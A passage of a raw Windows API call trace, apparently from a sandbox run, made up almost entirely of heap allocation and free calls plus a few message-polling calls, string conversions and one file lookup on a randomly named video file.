lpMsg=0x144f2dc) returned 0 [0097.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0097.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0097.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0097.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0097.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0097.205] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0097.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0097.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0097.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0097.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0097.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.205] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\vJ4PRQa2pJimDueSCaM.mkv", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83dcebb0, ftCreationTime.dwHighDateTime=0x1d5e857, ftLastAccessTime.dwLowDateTime=0xef491730, ftLastAccessTime.dwHighDateTime=0x1d5e540, ftLastWriteTime.dwLowDateTime=0xef491730, ftLastWriteTime.dwHighDateTime=0x1d5e540, nFileSizeHigh=0x0, nFileSizeLow=0x4bf9, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="vJ4PRQa2pJimDueSCaM.mkv", cAlternateFileName="VJ4PRQ~1.MKV")) returned 0x41ac500 [0097.205] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0097.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0097.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0097.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0097.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0097.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0097.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0097.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0097.206] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0097.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0097.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0097.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0097.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0097.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0097.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0097.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0097.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0097.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0097.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cb0 [0097.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0097.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0097.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0097.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0097.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0097.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0097.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0097.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0097.206] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0097.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0097.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0097.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0097.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0097.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0097.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0097.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0097.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0097.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0097.207] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0097.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0097.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0097.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0097.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2500 [0097.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0097.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0097.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0097.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0097.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0097.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0097.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0097.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0097.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0097.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0097.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0097.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9de8 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0097.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0097.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0097.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0097.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0097.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0097.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0097.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0097.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0097.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0097.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0097.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0097.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0097.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0097.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0097.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0097.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0097.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0097.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0097.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0097.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0097.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0097.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0097.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0097.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0097.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0097.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0097.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0097.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0097.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0097.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0097.210] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0097.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0097.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0097.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0097.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0097.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0097.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0097.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0097.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0097.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0097.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0097.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0097.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0097.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0097.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0097.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0097.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0097.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0097.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0097.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0097.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0097.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0097.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0097.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0097.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0097.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0097.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0097.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0097.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0097.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0097.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0097.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0097.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0097.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0097.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0097.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0097.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0097.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0097.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0097.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0097.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0097.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0097.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0097.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0097.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0097.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0097.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0097.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0097.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0097.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0097.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0097.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0097.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0097.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0097.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0097.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0097.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0097.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0097.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0097.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0097.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0097.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0097.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0097.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0097.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0097.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0097.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0097.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0097.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0097.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0097.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0097.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0097.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0097.213] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0097.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0097.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0097.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0097.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0097.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0097.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0097.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0097.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0097.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0097.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0097.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0097.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0097.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0097.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0097.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0097.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0097.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0097.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0097.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0097.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0097.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0097.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0097.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0097.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0097.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0097.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0097.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0097.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0097.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0097.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0097.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0097.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0097.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0097.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0097.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0097.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0097.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0097.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0097.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0097.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0097.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0097.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0097.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0097.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0097.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0097.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0097.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 